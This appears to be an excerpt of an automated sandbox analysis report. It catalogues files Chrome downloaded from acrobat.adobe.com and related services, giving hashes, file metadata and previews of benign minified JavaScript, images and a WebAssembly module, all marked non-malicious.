                                                      SHA-512:8377A446F51061588B6124DE8A3A7ED59B42964A20ACD28D0697271F9AC7E1C456143AF87EF8BAED2A10FD61F4961CDEE46850877E2B222032EFAA78EBDC4C33
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[3577],{t39f:e=>{e.exports=JSON.parse('{"genAI.optIn.dialog.title":"Generative AI in Acrobat","genAI.optIn.dialog.agree":"Agree","genAI.optIn.dialog.cancel":"Cancel","genAI.optIn.dialog.confirm":"OK","genAI.optIn.dialog.content.description":"Now you can enhance document productivity with generative AI in Acrobat. As you explore, please keep these points in mind:","genAI.optIn.dialog.content.option1":"Using generative AI in Acrobat to engage in infringing, unlawful, or unethical acts is prohibited.","genAI.optIn.dialog.content.option2":"You.re responsible for any content you create using generative AI in Acrobat.","genAI.optIn.dialog.content.age.guideline":"You confirm that you.re 18 years old or older.","genAI.optIn.dialog.footer.guidelines":"By clicking <bold>Agree</bold>, you agree to our {guidelinesLink}.","genAI.optIn.dialog.footer.settings":"To disable generative AI features, go to <bold>Settings >
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):89948
                                                      Entropy (8bit):5.5586837483302745
                                                      Encrypted:false
                                                      SSDEEP:1536:+BPnbwMAuDlqf7PVpf4V+j5MioSgyX1JC9GaD2oew+WQScZ0m:GPnDqf7P3fgSoa
                                                      MD5:7D7D924B670DAA2E8D204BEA10C0D413
                                                      SHA1:AEEB7862FCABAA3F789E7ADA38179D28D336A292
                                                      SHA-256:0EFC9008000BC89975050EAA873D20E5B7BAE261674A4B53DF3C3724384E5689
                                                      SHA-512:D55BC716EBE4C8B9ABBD060F195FBE5A7CD2C92DDA95493B847383979D6271DD02DF4BB22CBD13BDF7D6F49FB275E738516AB869D0CFEA70BEA66246AF880B3A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/tools-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="0b290876-5ab0-4937-99b0-671ae74f0b44",e._sentryDebugIdIdentifier="sentry-dbid-0b290876-5ab0-4937-99b0-671ae74f0b44")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[5895],{H8In:e=>{"use strict";var t,i="object"==typeof Reflect?Reflect:null,s=i&&"function"==typeof i.apply?i.apply:function ReflectApply(e,t,i){return Function.prototype.apply.call(e,t,i)};t=i&&"function"==typeof i.ownKeys?i.ownKeys:Object.getOwnPropertySymbols?function ReflectOwnKeys(e){return Object.getOwnPropertyNames(e).concat(Object.getOwnPropertySymbols(e))}:function ReflectOwnKeys(e){return Object
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (19404)
                                                      Category:downloaded
                                                      Size (bytes):19450
                                                      Entropy (8bit):5.588525053491922
                                                      Encrypted:false
                                                      SSDEEP:384:g4tVteKU9VxDBgOrZKGUAXNbH2G6W9xGh9RC8AlWJd+:g4RJUNDmONKGUAgG6WbGh9RLAlWJk
                                                      MD5:2F2F6364DE6B128473D3F37C100CBC01
                                                      SHA1:866BB9EDFCD1CDD6BDE263790A9C124F64FA6BF7
                                                      SHA-256:73C8CD4F4B887BB9E588E7F5ECF9430A2851D9C98DCE5DC6EB84960B863096B0
                                                      SHA-512:1870CF0B021254078CC1DFB2B731477154906951EBF2204023718DD9B065C8CDA1E02B6526164C9BCD8BD215BABA91671A71ADE3681BBD619E7A2FF5AD7F5F9F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/bootstrap.js
                                                      Preview:(()=>{var e,r,t,n,o={"DH/Q":(e,r,t)=>{"use strict";t.d(r,{c:()=>urlWithoutQueryParam});var n=t("plsW");const urlWithoutQueryParam=(e,r)=>{const t=n.router.getQueryParams();if(t&&t[r]&&delete t[r],t){let r=Object.keys(t).reduce(((e,r)=>`${e}${0===e.length?"?":"&"}${encodeURIComponent(r)}=${encodeURIComponent(t[r])}`),"");return""===r&&(r="?"),n.router.withQueryParams(`${n.discovery.dropins[e].router_path}`,{search:r})}return n.router.withQueryParams(`${n.discovery.dropins[e].router_path}`)}},Issy:(e,r,t)=>{"use strict";t.d(r,{F:()=>getMessage,Z:()=>o});var n=t("plsW");const loadTranslations=e=>(t.p=n.discovery.dropins["nav-bar"].public_path,t("AWKe")(`./${e}.json`).catch((()=>t.e(818).then(t.t.bind(t,"t39f",19))))),getMessage=e=>loadTranslations(n.locale2.getLocale()).then((r=>{const t=r[e];if(t)return t;throw new Error(`No translation for ${e}`)})),o=loadTranslations},r16C:(e,r,t)=>{var n=t("YWiy");function SDCMsTeamsAcrobatTrefoil32N(e){return n.createElement("svg",e,[n.createElement(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):112260
                                                      Entropy (8bit):5.608229572546977
                                                      Encrypted:false
                                                      SSDEEP:1536:Zcpc7K/kQaUlhBxdyNqddt+Ij4YGadXIlmFoXIWi0V21nLBSxcosoKdr6jq5TjMI:ZcpWK/kQaUBGIt+Ij4Y8ocNxHI
                                                      MD5:8F9ED5EF47A19680F87A89673D1DAECA
                                                      SHA1:7938F6D99095004DA7F8288D5F896CE6EA6E8376
                                                      SHA-256:EF101D466AFFB58129FCF79081D9D5F2B757B1FA78B1DB2D259FB3E05AC645D5
                                                      SHA-512:4BFEBE8C5FA3DD305558D1CADA80CBB7927497AB3FD3F7490CC983ADDDB3885EDD16CF4DAAA31C5442E6E8A41909CD2CEE92B0980C89160FDE5B69AAD6E5811E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/2255-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2255],{F52N:(e,t,r)=>{"use strict";t.N=function A4uChevronUp(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.createElement("path",{fillRule:"evenodd",d:"M28,21.98a2,2,0,0,1-3.411,1.411l-6.578-6.572-6.578,6.572a2,2,0,0,1-2.874-2.773l.049-.049L16.6,12.585a2,2,0,0,1,2.825,0h0l7.989,7.983A1.989,1.989,0,0,1,28,21.98Z"}))};var n=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},_extends.apply(this,arguments)}},kwH1:(e,t,r)=>{"use strict";r.d(t,{A:()=>a});var n=r("3aG4"),i=r("abd3"),__decorate=function(e,t,r,n){var i,a=arguments.length,o=a<3?t:null===n?n=Object.getOwnPropertyDescriptor(t,r):n;if("object"==typeof Reflect&&
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):937
                                                      Entropy (8bit):7.737931820487441
                                                      Encrypted:false
                                                      SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:downloaded
                                                      Size (bytes):35
                                                      Entropy (8bit):2.9302005337813077
                                                      Encrypted:false
                                                      SSDEEP:3:CUHaaatrllH5:aB
                                                      MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                      SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                      SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                      SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://p.typekit.net/p.gif?s=1&k=bxf0ivf&ht=tk&h=acrobat.adobe.com&f=7180.7181.7182.7184.7185.22474&a=19707152&js=1.21.0&app=typekit&e=js&_=1742307674288
                                                      Preview:GIF89a.............,..............;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):65644
                                                      Entropy (8bit):4.693089206172513
                                                      Encrypted:false
                                                      SSDEEP:768:q7I6d9VoFqHXGcuUvKODp3UyUe/lb+KTbhCVJrQCqEGLy+moZOs:q7I6LVocHXGcuUCQb/lb+WkjrYNLy+xl
                                                      MD5:BD2ED71CEB43E59EEDBA5BA5F077C626
                                                      SHA1:9F8D9D927390F493F395C9D8D74F53CF65518977
                                                      SHA-256:484A8264645A628CC5EDFB67EBC4AB4F7B5CD2D2B2ADE615FD40F6E03A2B7D93
                                                      SHA-512:52EC2F03EFB197FB59A8C92AF4B29B82DC3248BCA1669F5A2237C39526A6DA97C8B88680FCBD1F724BCD4161254BF5949178E1D02B4D066C8BD2F85E0A328F8C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/tile-icons.js
                                                      Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7979,5092,7760],{"8BCc":(e,l,t)=>{var a=t("YWiy");function A12SplitPdf24(e){return a.createElement("svg",e,a.createElement("g",{id:"A12_Split-pdf_24",stroke:"none",strokeWidth:"1",fill:"none",fillRule:"evenodd"},a.createElement("g",{transform:"translate(1.000000, 0.000000)",fill:"#D7373F",fillRule:"nonzero"},[a.createElement("path",{d:"M12.6767776,1.00019208 L12.7879026,1.00726736 C12.9708813,1.03121746 13.1409678,1.11520928 13.2720072,1.24802135 L13.2720072,1.24802135 L16.7437634,4.53199165 L16.8190863,4.61827384 C16.9345681,4.76956131 16.9989527,4.95637301 17.0000125,5.15028646 L17.0000125,5.15028646 L16.996,14.5241921 L15.6020907,12.7990162 L15.4644298,12.6188526 L15.328728,12.4562013 C14.7276523,11.782684 13.9280674,11.4792957 12.9717792,11.9811074 L12.9717792,11.9811074 L12.8155145,12.0784151 L12.6719914,12.1911613 C11.9008581,12.8438333 11.8425584,13.7245285 12.2954091,14.5178627 C12.3066131,14.5
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):309720
                                                      Entropy (8bit):5.48352329134376
                                                      Encrypted:false
                                                      SSDEEP:6144:sTXaDvl/W9eF7oWdS4R7cNueXYBfqOS4R7cyEFD5HGnI55V:sTXaDvlDdS4R7cNueXYBfqOS4R7cF6Il
                                                      MD5:4862DBDB4EC55F1D7ACB37D18F0BF43C
                                                      SHA1:636F4516C44041DFF8CA2CF08799985FBFAF2CD4
                                                      SHA-256:E974D085664DB4547185610CFFB3AE4138C5E859DD089D27B597E76A78D3A1E9
                                                      SHA-512:0852BD40021A63B1234C6C77F37EA561A2660621CC337E0E0B77B86D6B36C1BA05BEA670FA4A44E7FDCC0D086702AEA1E91BD309419108B22863B85DC09DAC7E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/RHComments-expandedPanelContainer-commentDialogContainer-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[7381],{SpxO:(e,t,n)=>{e.exports=n("fIZv")},fIZv:(e,t,n)=>{"use strict";var i=n("AAps");t.default=Rule;var s=i(n("z3HK")),a=i(n("jp00")),l=i(n("PZ3W")),c=i(n("e1tA")),m=i(n("/hLX")),d=i(n("YWiy"));function Rule(e){var t=e.className,n=e.variant,i=void 0===n?"large":n,m=(0,a.default)(e,["className","variant"]);return d.default.createElement("hr",(0,s.default)({},(0,c.default)(m),{className:(0,l.default)("spectrum-Rule","spectrum-Rule--".concat(i),t)}))}n("me+h"),n("Vu1c"),n("JAUc"),Rule.propTypes={variant:m.default.oneOf(["large","medium","small"])}},f2ee:(e,t,n)=>{"use strict";n.d(t,{Fm:()=>l,Jd:()=>s,_f:()=>c,il:()=>i,wn:()=>a});const i=38,s=40,a=9,l=13,c=27},DM6e:(e,t,n)=>{"use strict";n.d(t,{Ax:()=>isCurrentDeviceTablet,CN:()=>isTouchDevice,cX:()=>isMac,sq:()=>isCurrentDeviceMobile,uF:()=>isWindows,un:()=>isIOS});var i=n("klCL"),s=n.n(i);window.devicePixelRatio;const a="mobile",getDeviceInfo=()=>(new(s())).getDev
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (54555)
                                                      Category:downloaded
                                                      Size (bytes):54622
                                                      Entropy (8bit):5.291237928384655
                                                      Encrypted:false
                                                      SSDEEP:1536:z+ogErTD758hhyS7nD758hl58fYPVqxGgCT:z+ogHT0kY9EC
                                                      MD5:1CD5ECD38B714E5F36E2164108C84633
                                                      SHA1:EAAFE26B54D2D4F619E6D57DD40F811178796CA8
                                                      SHA-256:8E71B7C6CAB15F241DABB44FD53D8AAFD008E74BFAA591728A5AAB17A9B1AEB4
                                                      SHA-512:043FEDD8A150C6D6069EE67CC43EE9FFE72B30F9C4C34FF4601DEBEB3AB2302C026CFB8133D7E77B3A252EBBBC2E3EF13203A1AADA5EA538BC71807B72D19F25
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/home/006ad14344/791-1e38ac8c256ec2a78f96.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="fe85c87d-a3a9-4ba2-9b77-50bb52a17b2e",e._sentryDebugIdIdentifier="sentry-dbid-fe85c87d-a3a9-4ba2-9b77-50bb52a17b2e")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"006ad143443732a31b79a885bb25ab6ae1f1d89a"},(self["webpackJsonp-dc-web-app"]=self["webpackJsonp-dc-web-app"]||[]).push([[791],{HP0F:(e,t,i)=>{"use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function _typeof(e){return typeof e}:function _typeof(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}function boundMethod(e,t,i){var o=i.value;if("function"!=typeof o)throw new TypeError("@boundMethod
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (2724)
                                                      Category:downloaded
                                                      Size (bytes):2783
                                                      Entropy (8bit):5.348115967110134
                                                      Encrypted:false
                                                      SSDEEP:48:YRAsj6wd/bSkXPCyX3CI9k3coJnXyr/PXBUH5l1AjDLyftnFMPMmV:fsj6+z/X62CI94JCrRCfm3AtnuPpV
                                                      MD5:0773AE98E2FF0DA32D9B1225ED68E83C
                                                      SHA1:6742C920BE694C47ED623DB5CC8319F5A74791DB
                                                      SHA-256:FCF858AE48762E09CF08081B5AC3D1645DE26A29A1798C3BD96CE0BDF59BE9E9
                                                      SHA-512:49D0F66851ED8E34E7569646D514C9DA5CCF52E2215072899BE0C2BC50CFABB425F1DD9EA64AE91091DD2F2090769D10E576C7AA405CE7E9F4DA7CF21A2AEBA5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.582.0/global-nav-store-chunk.js
                                                      Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[993],{QWgQ:(e,i,t)=>{"use strict";t.d(i,{ul:()=>n});const n=Object.freeze({HAMBURGER_MENU_RIGHT:"hamburgerMenuRight",HAMBURGER_MENU_LEFT:"hamburgerMenuLeft"})},R9kL:(e,i,t)=>{"use strict";t.r(i),t.d(i,{default:()=>d});var n,o,r=t("Evfb"),l=t("Uvsd"),a=t("plsW"),s=t("abd3"),c=t("QWgQ");const u=a.logging.getLogger("nav-store"),g={navigation:null,branding:null,brandingPosition:c.ul.HAMBURGER_MENU_RIGHT,main:null,sideMenuActions:null,topBarActions:null,spectrumTheme:null,backgroundColor:null,layout:null,hidden:!1,hideProgress:!1,hideAdobeLogo:!1,hideUtilNav:!1,hideSelectedSideMenuActionInSmallerScreens:!1,alwaysShowMain:!1,showBetaFeedback:!1,showProgressBeforeActions:!1,showDocCloudLabel:!1,showWhatsNewNotification:!1,shouldWhatsNewBeShown:!1,noFilename:!1,onFileNameClick:null,showLocation:!1,uncAppId:"dc-web-app",clearInactiveProgressCallback:()=>{},removeHistoryHrefCallback:()=>{}};let d=(n=class GlobalNavStore
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:downloaded
                                                      Size (bytes):4788873
                                                      Entropy (8bit):5.543501611557288
                                                      Encrypted:false
                                                      SSDEEP:24576:eVGVQG4T5Xqi+VthTr/Rf9j7DtBlmASbFCmAobF6bFLmAlb9Yb9qbFdbFtbF5bFf:eGXbR
                                                      MD5:B22A37A89E58B6F15418BC05CC8CF44E
                                                      SHA1:563EC89F6320C9B87E7F83AB8B9DEA0961BFEF55
                                                      SHA-256:7692FBC1F5A25AE379E5F19629418A77FAB64BD494428777BD5CA75BB5A1D597
                                                      SHA-512:613677AC02BAFFCC08344EAB7461D70009B0D24255CFD51DE71ABB9DF93736BEEBAFC10071630AD2DF8C6998899A7C7BDE74D31ADA562CF23748EA4BE4B1E124
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.5c352f16d0b47ea14845f1b29d34fc07.part1.wasm
                                                      Preview:.asm.......dylink.0....H..]......`...`....`....`.....`.....`......`......`.......`.......`........`........`.........`..`.........`..........`..~.`...~`..........`...........`...`...}`..}.`..}..`..}}..`...~...`...........`...}..`....}.`............`..}...`..}...`.}.}`...~.`.}...`..}}}}..`....}`....~..`...}.`..~~~~.`.....}.`............`..~..~`.............`..~..`...~..`..~~..`.....~..`...~..`..............`..|.`...}..`.~...`.............`..}}..`..~.~`.}}.}`..~...`..}}.`......}.`..~...`..}..`...}}..`..}}}}}}..`.~~.~`..|`..|..`..~`...}.}`.|.}`.|..|`.}..`...}}}....`...}...`....~`......}}.`......~..`...............`.}.....`..~~.`......~`.....}`..}}}}}}}}...`...............`.................`..|......`.}..}`....~~..`....|..`.....~~..`.....|..`......~~..`.~..`...|`...|.|`..}}...`...}}}...`....~.~`..}}}}}}.`.~~~~..`..}}}.`..................`.....}..`........}}...`....}}}..`..~..~.`...}}}}}}}}...`....}}}}}}}}.`......}}....`...}}..`..~....`....||.....`.....~..`...}}.`..............}....`..}.}.}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48238)
                                                      Category:downloaded
                                                      Size (bytes):48239
                                                      Entropy (8bit):5.343270713163753
                                                      Encrypted:false
                                                      SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                      MD5:184E29DE57C67BC329C650F294847C16
                                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (29235)
                                                      Category:downloaded
                                                      Size (bytes):29307
                                                      Entropy (8bit):5.651486590535841
                                                      Encrypted:false
                                                      SSDEEP:384:p32yJfAVrxlFnUCob9fb6XrOTf8Gu9hlMFXbpnUYjwGXzhPQVVtGKYaIoj:pRfExlRob9fb6XrOD8GmcztPQVXGc
                                                      MD5:FF666EABDBEAEC830A145EE30B44641F
                                                      SHA1:2499C4A15904E9A9CFE0B03809A8A5B54419C61B
                                                      SHA-256:E3B55EE9EFE2F1B754B538D5054E07AD024ECEBF63841E2111C5CDCEB418C464
                                                      SHA-512:A14798E992FADC7BAC6EC045E23430F95F07CC396B1BED1EA478839260645BAFE1ED53C7D7DD71D2AC03E0487552B8CC591930FB034C5A672D7F8C17EEDA30D7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/assistantFloatingActionDropin-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5515],{Rxek:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>P});var i=n("YWiy"),o=n("plsW"),r=n("Zm2D"),a=n("XmxE"),l=n("I/yI"),s=n("0rPo"),c=n("D1Al"),d=n("EVtp"),u=n("Ntb/"),g=n("Ejot"),p=n("oDTv"),A=n.n(p),m=n("KNa2"),_=n.n(m),h=n("EOhm"),b=n.n(h),C=n("PZ3W"),v=n.n(C),f=n("bi4D"),E=n("3aG4"),B=n("j9p9"),I=n.n(B),F=n("j629"),S=n("+znL"),x=n("nFZN"),y=n.n(x);class FloatingActionBar extends i.Component{constructor(e){super(e),this.changePlaceholder=()=>{this.setState((e=>({placeholderIndex:(e.placeholderIndex+1)%this.props.placeholderTexts.length})))},this.handleInputChange=async e=>{!this.props.shouldShowFreeUserBadge||this.props.isCreditAvailable?this.setState({questionText:e}):await this.props.handleCreditsExhausted(this.props.genAIClient)},this.handleFocus=()=>{this.setState({isFocused:!0})},this.handleBlur=()=>{this.setState({isFocused:!1})},this.handleSendClick=()=>{this.props.onSendClick(this.state.questionText.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (44246)
                                                      Category:downloaded
                                                      Size (bytes):44309
                                                      Entropy (8bit):5.567885604802512
                                                      Encrypted:false
                                                      SSDEEP:768:iBnGRLRnRi8N01F7+cc+VVl1CZTEhdoitOlcA6lQVf5lVGzPDc28IyT1Beg3Tf5F:iBn8IS48vIP8Icf5UYvzR20
                                                      MD5:1EE40E3E2612889B1A154336D241F0BB
                                                      SHA1:18100D552A7BF12817845C149B9609C329A5141D
                                                      SHA-256:E4D7EB6B374A7D6B57ED8FEE7CC1A0AC30C2684D15D284DC3CC754BE82F5C59D
                                                      SHA-512:97A07E92F03C5AC659237D064C2C8B978CE13E3983AEB9572744DB8A6DD4B0860110B65872986CB8508C2A37E969F6BC341595BFF9E44885FB97B80C63410C9D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.717.0/storage-connectors-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="3d91767a-66a0-4529-90dd-b69c7e795c45",e._sentryDebugIdIdentifier="sentry-dbid-3d91767a-66a0-4529-90dd-b69c7e795c45")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"b2aaa94a66520d673e9e90091d77d97c59bf9850"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[7247],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",n=e[3];if(!n)return r;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);retu
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
